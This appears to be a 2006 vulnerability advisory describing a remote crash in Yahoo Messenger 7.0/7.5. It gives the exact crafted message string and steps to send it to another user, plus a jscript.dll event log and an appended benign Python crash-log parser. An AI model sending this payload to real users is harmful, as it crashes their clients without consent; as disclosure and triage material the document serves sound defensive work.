Yahoo messenger bug

2006-06-22T00:00:00
ID SECURITYVULNS:DOC:13274
Type securityvulns
Reporter Securityvulns
Modified 2006-06-22T00:00:00

Description

Hi,

I found a vulnerability in Yahoo Messenger: if you receive a private message with this string "msg:---------------------------------------------iframe onload=$InlineAction()>:)" (without quotes), Yahoo Messenger will crash with a runtime error.

Remote crash proof of concept:

1. Open Messenger and log in.
2. Open a third-party Yahoo chat client like yahelite version 269 through the Ymsgr protocol and log in with another account.
3. Send a PM to the Messenger account with this string: "s: msg :---------------------------------------------iframe onload=$InlineAction()>:)" (without quotes)
4. The remote user will crash closing down her messenger.

Note: "msg :" this space must be created with alt+0160.

s:(space)msg(alt+0160):---------------------------------------------iframe onload=$InlineAction()>:)

Tested in Yahoo Messenger 7.0/7.5. I haven't tried it in Yahoo Messenger 8.0 Beta yet.

This is the event log:

0000: 41 70 70 6c 69 63 61 74   Applicat
0008: 69 6f 6e 20 46 61 69 6c   ion Fail
0010: 75 72 65 20 20 79 70 61   ure  ypa
0018: 67 65 72 2e 65 78 65 20   ger.exe
0020: 37 2e 30 2e 30 2e 34 33   7.0.0.43
0028: 38 20 69 6e 20 6a 73 63   8 in jsc
0030: 72 69 70 74 2e 64 6c 6c   ript.dll
0038: 20 35 2e 36 2e 30 2e 38    5.6.0.8
0040: 38 33 31 20 61 74 20 6f   831 at o
0048: 66 66 73 65 74 20 30 30   ffset 00
0050: 30 31 36 38 39 31 0d 0a   016891..

I have installed the latest version of jscript.dll but the problem continues. So do you have any information about this issue? I discovered that it's a vulnerability exploited in the wild since February but I don't have enough information.

Regards
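Added example, not part of the original report: a small Python parser for crash triage that rebuilds the bytes from the event log data dump quoted above and extracts the faulting application, module, versions and offset. The function names are illustrative, and the offset is assumed to be hexadecimal, as Windows prints it in Application Failure records.

```python
import re

# Event-log data dump copied from the report above: offset, 8 hex bytes, ASCII column.
EVENT_DUMP = """\
0000: 41 70 70 6c 69 63 61 74   Applicat
0008: 69 6f 6e 20 46 61 69 6c   ion Fail
0010: 75 72 65 20 20 79 70 61   ure  ypa
0018: 67 65 72 2e 65 78 65 20   ger.exe
0020: 37 2e 30 2e 30 2e 34 33   7.0.0.43
0028: 38 20 69 6e 20 6a 73 63   8 in jsc
0030: 72 69 70 74 2e 64 6c 6c   ript.dll
0038: 20 35 2e 36 2e 30 2e 38    5.6.0.8
0040: 38 33 31 20 61 74 20 6f   831 at o
0048: 66 66 73 65 74 20 30 30   ffset 00
0050: 30 31 36 38 39 31 0d 0a   016891..
"""

# One dump row: 4-digit hex offset, then at most 8 two-digit hex bytes.
ROW = re.compile(r"^([0-9a-fA-F]{4}):((?: [0-9a-fA-F]{2}){1,8})")
FAULT = re.compile(
    r"Application Failure\s+(?P<app>\S+) (?P<app_version>[\d.]+) in "
    r"(?P<module>\S+) (?P<module_version>[\d.]+) at offset (?P<offset>[0-9a-fA-F]+)"
)

def decode_dump(dump):
    """Rebuild raw bytes from the hex column; reject dumps with missing rows."""
    data = bytearray()
    for line in dump.splitlines():
        m = ROW.match(line.strip())
        if not m:
            continue  # skip blank or non-dump lines
        if int(m.group(1), 16) != len(data):
            raise ValueError(f"gap or overlap at offset {m.group(1)}")
        data += bytes.fromhex(m.group(2))
    return bytes(data)

def parse_fault(dump):
    """Return the fault record as a dict, or None if the text is not a failure record."""
    text = decode_dump(dump).decode("ascii", errors="replace")
    m = FAULT.search(text)
    if not m:
        return None
    rec = m.groupdict()
    rec["offset"] = int(rec["offset"], 16)  # assumption: offset is printed in hex
    return rec

if __name__ == "__main__":
    print(parse_fault(EVENT_DUMP))
```

Grouping crash events by the (module, module_version, offset) triple shows whether several client crashes share the same faulting location.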

